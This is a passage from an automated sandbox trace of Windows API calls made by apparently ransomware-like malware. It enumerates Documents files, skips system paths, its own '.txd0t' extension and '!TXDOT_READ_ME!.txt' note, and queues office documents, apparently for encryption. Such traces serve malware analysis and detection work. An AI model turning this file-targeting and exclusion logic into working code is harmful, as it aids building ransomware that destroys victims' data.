returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.732] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VSf1IL-6_DKVGroXOg.docx", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" [0074.732] PathFindExtensionW (pszPath="VSf1IL-6_DKVGroXOg.docx") returned=".docx" [0074.732] StrCmpW (psz1=".docx", psz2=".txd0t") returned -1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="bootsect.bak") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="iconcache.db") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="thumbs.db") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2=" ransomware ") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2=" ransom ") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="debug.txt") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="boot.ini") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="desktop.ini") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="autorun.inf") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="ntuser.dat") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="ntldr") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="ntdetect.com") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="bootfont.bin") returned 1 [0074.732] StrCmpIW (psz1="VSf1IL-6_DKVGroXOg.docx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.732] PathFindExtensionW (pszPath="VSf1IL-6_DKVGroXOg.docx") returned=".docx" [0074.732] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".docx") returned 0x0 [0074.732] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.732] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.732] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.743] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.743] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx" [0074.743] SetEvent (hEvent=0x3fc) returned 1 [0074.743] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8a610, ftCreationTime.dwHighDateTime=0x1d5ef08, ftLastAccessTime.dwLowDateTime=0xa080e8e0, ftLastAccessTime.dwHighDateTime=0x1d5e125, ftLastWriteTime.dwLowDateTime=0xa080e8e0, ftLastWriteTime.dwHighDateTime=0x1d5e125, nFileSizeHigh=0x0, nFileSizeLow=0x12251, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="w3sXXqR.xlsx", cAlternateFileName="W3SXXQ~1.XLS")) returned 1 [0074.743] StrCmpW (psz1="w3sXXqR.xlsx", psz2=".") returned 1 [0074.743] StrCmpW (psz1="w3sXXqR.xlsx", psz2="..") returned 1 [0074.743] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="w3sXXqR.xlsx", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" [0074.743] PathFindExtensionW (pszPath="w3sXXqR.xlsx") returned=".xlsx" [0074.743] StrCmpW (psz1=".xlsx", psz2=".txd0t") returned 1 [0074.743] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="bootsect.bak") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="iconcache.db") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="thumbs.db") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2=" ransomware ") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2=" ransom ") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="debug.txt") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="boot.ini") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="desktop.ini") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="autorun.inf") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="ntuser.dat") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="ntldr") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="ntdetect.com") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="bootfont.bin") returned 1 [0074.744] StrCmpIW (psz1="w3sXXqR.xlsx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.744] PathFindExtensionW (pszPath="w3sXXqR.xlsx") returned=".xlsx" [0074.744] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xlsx") returned 0x0 [0074.744] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.744] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.744] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.753] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.753] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx" [0074.753] SetEvent (hEvent=0x3fc) returned 1 [0074.753] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x3007e1f0, ftLastAccessTime.dwHighDateTime=0x1d5ec41, ftLastWriteTime.dwLowDateTime=0x3007e1f0, ftLastWriteTime.dwHighDateTime=0x1d5ec41, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 1 [0074.753] StrCmpW (psz1="_HV0qcp0pks", psz2=".") returned 1 [0074.753] StrCmpW (psz1="_HV0qcp0pks", psz2="..") returned 1 [0074.753] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0074.753] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0074.753] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="_HV0qcp0pks", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system32\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\local\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.753] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\boot\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\perflogs\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\programdata\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\drivers\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\wsus\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="crypt_detect") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="cryptolocker") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="ransomware") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\WINDOWS") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.754] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files") returned 0x0 [0074.754] GetProcessHeap () returned 0xe30000 [0074.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x50c) returned 0xed5bd8 [0074.754] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.754] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\*", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*" [0074.755] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*", lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x3007e1f0, ftLastAccessTime.dwHighDateTime=0x1d5ec41, ftLastWriteTime.dwLowDateTime=0x3007e1f0, ftLastWriteTime.dwHighDateTime=0x1d5ec41, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0074.755] StrCmpW (psz1=".", psz2=".") returned 0 [0074.755] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x3007e1f0, ftLastAccessTime.dwHighDateTime=0x1d5ec41, ftLastWriteTime.dwLowDateTime=0x3007e1f0, ftLastWriteTime.dwHighDateTime=0x1d5ec41, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.755] StrCmpW (psz1="..", psz2=".") returned 1 [0074.755] StrCmpW (psz1="..", psz2="..") returned 0 [0074.755] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5030a3b0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0x7ca2aee0, ftLastAccessTime.dwHighDateTime=0x1d5ee6d, ftLastWriteTime.dwLowDateTime=0x7ca2aee0, ftLastWriteTime.dwHighDateTime=0x1d5ee6d, nFileSizeHigh=0x0, nFileSizeLow=0x3591, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="iTea.pptx", cAlternateFileName="ITEA~1.PPT")) returned 1 [0074.755] StrCmpW (psz1="iTea.pptx", psz2=".") returned 1 [0074.755] StrCmpW (psz1="iTea.pptx", psz2="..") returned 1 [0074.755] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.755] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0074.755] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="iTea.pptx", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" [0074.755] PathFindExtensionW (pszPath="iTea.pptx") returned=".pptx" [0074.755] StrCmpW (psz1=".pptx", psz2=".txd0t") returned -1 [0074.755] StrCmpIW (psz1="iTea.pptx", psz2="bootsect.bak") returned 1 [0074.755] StrCmpIW (psz1="iTea.pptx", psz2="iconcache.db") returned 1 [0074.755] StrCmpIW (psz1="iTea.pptx", psz2="thumbs.db") returned -1 [0074.755] StrCmpIW (psz1="iTea.pptx", psz2=" ransomware ") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2=" ransom ") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="debug.txt") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="boot.ini") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="desktop.ini") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="autorun.inf") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="ntuser.dat") returned -1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="ntldr") returned -1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="ntdetect.com") returned -1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="bootfont.bin") returned 1 [0074.756] StrCmpIW (psz1="iTea.pptx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.756] PathFindExtensionW (pszPath="iTea.pptx") returned=".pptx" [0074.756] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pptx") returned 0x0 [0074.756] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0074.756] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0074.756] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.766] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.766] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" [0074.766] SetEvent (hEvent=0x3fc) returned 1 [0074.766] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf065b200, ftCreationTime.dwHighDateTime=0x1d5e1e3, ftLastAccessTime.dwLowDateTime=0xdee60400, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0xdee60400, ftLastWriteTime.dwHighDateTime=0x1d5e5e7, nFileSizeHigh=0x0, nFileSizeLow=0x111d8, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="PoJjjS_vt-KW.doc", cAlternateFileName="POJJJS~1.DOC")) returned 1 [0074.766] StrCmpW (psz1="PoJjjS_vt-KW.doc", psz2=".") returned 1 [0074.766] StrCmpW (psz1="PoJjjS_vt-KW.doc", psz2="..") returned 1 [0074.766] StrCpyNW (in: psz1=0xed5bd8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0074.766] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0074.766] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="PoJjjS_vt-KW.doc", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" [0074.766] PathFindExtensionW (pszPath="PoJjjS_vt-KW.doc") returned=".doc" [0074.766] StrCmpW (psz1=".doc", psz2=".txd0t") returned -1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="bootsect.bak") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="iconcache.db") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="thumbs.db") returned -1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2=" ransomware ") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2=" ransom ") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="debug.txt") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="boot.ini") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="desktop.ini") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="autorun.inf") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="ntuser.dat") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="ntldr") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="ntdetect.com") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="bootfont.bin") returned 1 [0074.766] StrCmpIW (psz1="PoJjjS_vt-KW.doc", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.766] PathFindExtensionW (pszPath="PoJjjS_vt-KW.doc") returned=".doc" [0074.767] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".doc") returned 0x0 [0074.767] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0074.767] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0074.767] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.780] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.780] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK 